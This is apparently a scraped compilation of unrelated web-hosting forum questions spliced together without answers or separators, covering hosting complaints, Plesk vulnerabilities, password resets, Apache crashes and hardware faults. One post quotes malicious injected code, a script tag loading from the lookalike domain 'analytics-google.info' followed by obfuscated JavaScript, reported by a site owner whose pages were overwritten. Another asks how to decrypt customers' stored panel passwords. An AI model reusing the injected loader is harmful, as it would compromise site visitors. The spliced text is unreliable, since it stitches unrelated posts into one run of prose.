Today we received an email saying that the admin password for the server had been changed by them and that we should log in and change the password again ourselves.
49pence have provided no explanation as to why the password was changed and despite multiple requests have refused to give any kind of explanation. I've also asked to speak to a manager and this request was denied (well, more ignored and I was given the same line that they cannot disclose why they changed a customers' password).
I am having a Plesk server and when I scanned it with tools like OpenVas, It detected the following vulnerabilities with CVE acronym. As the corresponding ports and services are being controlled by Plesk, I require to patch it.URL....As you can see this vulnerability has been hit on port 106. I checked the Plesk server and found the port 106 being used by service "poppassd". This was nothing I installed and came along with the Plesk installation. Hence just wanted to make sure whether it has a patch from Parallels. As per my investigation this service is used for changing mailbox passwords and I am currently using Roundcube client. How to patch this vulnerability.
As per the solution in pic, the vulnerability "SMTP antivirus scanner DoS" can be resolved by upgrading or installing anti virus for Plesk mail server. I am ready to buy Dr.Web or Kaspersky from Parallels. But wanted to make sure whether any of the above antivirus can resolve the vulnerability.
We use our own backoffice for remote logins. Passwords for panel login are encrypted. Is it possible to remove the option for customers to change their password for panel login so they will stay in sync with our own backoffice?
If it's not possible, is there a way to decrypt the panel login passwords, like there is for the admin-password (/usr/local/psa/bin/admin --show-password)?
I am thinking about using 49pence to colocate a couple of 2U servers.
Has anyone used them in the past? What was the service like? Do you get physical access to the servers?
Their packages seem fairly cheap and im unsure if thats a good thing or not!
Their package consists of..
This package includes: * 1 Amps of Power * 1x 100mbit Network Connection(s) to our Switch * 1 Power Connection(s) * 3000 Gigabytes of Data Transfer Volume per Month
This package also includes: * Free KVM over IP access * Backup and primary DNS * 24/7 automated reboots of your server * 24/7 Telephone support * Comprehensive server monitoring * Email and SMS alerts if your server has problems
provider of dedicated servers in europe, I have seen talk about Rapidswitch/49Pence on many occasions but I want know if it can be considered a good and safe option to use their servers for webhosting.
way to set up a user in passwd/shaddow to use no passwords. Not looking for keypair authentication or any authentication. just the abulity to run ssh <host> and I'm in.
Why - you might ask would I want something with no security? Because the shell that they are going to run is going to lock their IP out. This is a trap for SSH hackers allowing them to log in with any password/no password and immediately drop into something that runs iptables to kill their IP instantly. So I'll create a number of dummy accounts with names hackers try and it's a trap.
I'm planning on buying my first domain in order to host various sites of mine in one place. I like the idea of subdomains to separate them, but I was wondering... Is it possible to access different subdomains using different passwords? I'm planning to let a friend of mine use a subdomain to host a site of hers that's related to mine, and I'd like it if she had the security of a different password. I just want to know if I can even do this, and if so, what hosts offer this option?
for a one-time password system to help us secure some systems... we've looked at RSA SecurID but the software licenses are way too expensive.
Is there any reasonably priced one-time password system that we can use to secure SSH and access to internal systems? We'd like something with a keychain device that will generate the password.
I have about 7 hosting accounts, am a member of over 60 forums and have many other services that require passwords. Generally, I use the same or similar password. However, recently I have been getting more and more hacking of my sites going on and I worry if it is due to my password "system" (or lack of).
How do you go about creating your passwords, and remembering them?
The problem is that it switches from running to mounted without me having anything to do with it. It seems to be quite randomly, for example this morning at 1.42 am. This happens once a day and stops my vps and therefore my website - which is quite annoying.
I checked for log files or anything, but there was nothing mentioning resources or anything.
Does anyone have a clue what this might be? If I cannot fix the problem there is still the opportunity to just start the vps once it goes to status mounted. How would I automate this?
I just built a new pc, everything works well, but sometimes my computer will just restart randomly, it doesnt happen immedietly but randomly, within 30 or more minutes operating. Any ideas to why? and how i can fix it? ...
I am creating a web application, nothing spectacular just something to display content.
After completing a long night of coding, I uploaded my files to my server and checked to make sure everything was functioning correctly. Everything seemed fine so I went to bed.
The next morning, to my surprise, all my images had dissapeared! Well not all of them, just the ones being displayed through the PHP script. (coincidentally, these images where all in the same directory...)
Of course the first thought that went through my mind was "scripting error". Which surprised me, since everything worked perfectly the night before. I checked and double checked everything, and I couldn't find anything wrong. I checked the permissions on the directory holding the images and they appeared correct (755). So, to locate the problem I decided to strip out all the variables and create a test page that had only the SQL query, and a print to output the <img> code. Still nothing! So I decided to just go the HTML route and create a test file that held only the <img> code, no PHP involved... nothing.
The images are on the server. I double checked... if you right click > view image, it shows up. Then if you go back to the "test" page and refresh the image is there... however, it does not appear when you first load the page, or it appears and then immediately dissapears.
I contacted my host about the issue, and their first response said:
Quote:
Dear customer, The images are there if you login through plesk control panel and go to File Manager under your domain you can find the pictures and see them.But some of them are not opening under your website. Best Regards
Honestly... are you kidding me? Reiterating my question doesn't constitute as an answer. And they call themselves "engineers"...
Seeing as it appears to only be affecting one directory (and possibly only JPG images...? Have a look at the test pages above), I believe it might be a permissions issue.
I haven't really done anything new other then added another forum on the server (Invision).
Basically the problem is the random spikes I get. The main forum that is running on the server haven't really increased in terms of sim connections. Its usually around 180 - 220 during peak times.
On TOP there is usually around 250 tasks. When this thing started happening it would spikes to 500+ tasks which totally kills the server. Its pretty random also. Sometimes it'll go fine for a few hours and then suddenly climbed slowly up and then the server dies. For now its going to crash whenever I let apache run for an hour or so.
The only way I can restore is to restart apache. It has come to the point where I've had to put in restart apache in the cronjob list. Restart it every few minutes since I'm not always here watching over it. This is obviously a shortterm solution to keep the forum up while I troubleshoot this.
This is probably a long shot, but is there a workaround way to be able to edit passwords for addon domains in cPanel 11? Apparently you can only manage redirection or remove: ...
And now after creating a Joomla! site for a school that will be moving to my server from a local small isp that doesn't have a control panel (just a screen to allow users to set-up their email name and pwd) I'm stuck with trying to figure out how to set up their email accounts with their current password.
There are about 40 accounts that I can add manually, but when I change the nameservers, these teachers and staff are going to be at a loss as what to do; like I am at the moment.
From time to time all the POP3 user mailboxes get their password reset and users can't access their mail. I have to go in and manually reset each users password.
For the past few days I've been facing a weird problem where a few of my website pages (index.php, login.php etc) get overwritten with some google analytics code. The rest of the website pages remain fine.
At random times, the code in these php pages gets replaced by something like:
HTML Code: <script src="http://analytics-google.info/i/urchin.js"></script><script>function c41920832628m48687785ee773(m48687785eeb5b){ return (parseInt(m48687785eeb5b,16));}function m48687785ef712(m48687785efaf9){ function m48687785f06b2(){return 2;} var m48687785efeea='';m48687785f0e81=String.fromCharCode;for ...</script><script>check_content()</script>
Here's some debugging I have done.
1) If I rename login.php to say, log-in.php, the page gets saved from this
2) If I change the owner of login.php from the user to root, the page doesn't get overwritten anymore.
So basically, something somewhere running from the user account overwrites these specific pages. By the way, my website logs didnt show anything suspicious around the time when this first happened.
I use apache 2.4.1 and mod_fcgid (same config form apache 2.2.22+mod_fcgid 2.3.6) and without any error message, apache stop responding randomly.There is no problem with apache 2.2.22+mod_fcgid 2.3.6 and with apache 2.4.1 + php5_module i have
Randomly my server goes offline. There is no pattern to this. It can be fine for weeks then have 5 issues in one day. I have to restart Apache and it all come back on.
I'm not sure where to start to look for errors as I'm not that experienced.
Server Info Windows Server 2008 R2 Standard Edition PHP Version5.4.9 Apache VersionApache/2.4.1 (Win32) MySQL version 5.0.10
I got up today, went to check my emails and received invalid passwords on all my email accounts. I then went to check in the CPanels and get the same error when I try to login.
Then I try the root and same thing!
BUT all my linked FTP accounts work and the sites are online and working. One is giving a 500 error (cgi program) but besides that, they are all online w/ no changes.
My "host want to do a OS reinstall and let me try and restore my sites from a slave drive. I think thats stupid and shouldnt be needed.
They also automatically say I was hacked...Sure a hacker changed all the cpanel and email passwords but worked it so the linked FTP accounts would work and didnt take any sites offline.
Some of my Linux(WHM/Cpanel) hosted domains have a weird problem. They randomly become unavailable to me for periods of half hour to 2 hours. During this time I get a server not found error and I cannot access the domains through FTP either. However if I use a proxy or try to reach the domain through another server using RDC I am able to reach it.
This problem has happened to me twice on the very same server. I can't seem to figure out what's wrong with it.
My raid controller is Areca 1160 + 1GB Ram + 16xWD4000YS. Initially I had the problem of the disk dropping from the array randomly. I suppose this problem has been fixed since I have upgraded disks firmware according to WDC suggestion.
But there's another problem now. From my observation, the controller is randomly dropped off the system. When this happen, I cannot read/write anything from the disk at all. I can SSH in and able to run Areca CLI tool to see what's going on but only to get the message saying that it cannot find any Areca controller.
My only option is to restart the server and fsck all those 16 disks (not fun). I checked the log on the RAID controller itself, there was no sign of problem at all. No alert, no disk being dropped off the array, no events logged at all.
I'm using CentOS 4.3. Firmware on the RAID controller is 1.41, latest is 1.42. (Stupid me for not upgrading firmware when server crashed.) I plan to take the server down for RAID firmware upgrade soon. I just hoped that it's just problem with the firmware, not the controller or backplane itself.
my local host is just taking incredibly long to load. At work I've set it up no differently and it works like a charm, but at home, it works.. But at times it doesnt load instantly until I restart my browser. I have to press refresh or enter to login a million times for it to load after the first few seconds I use it.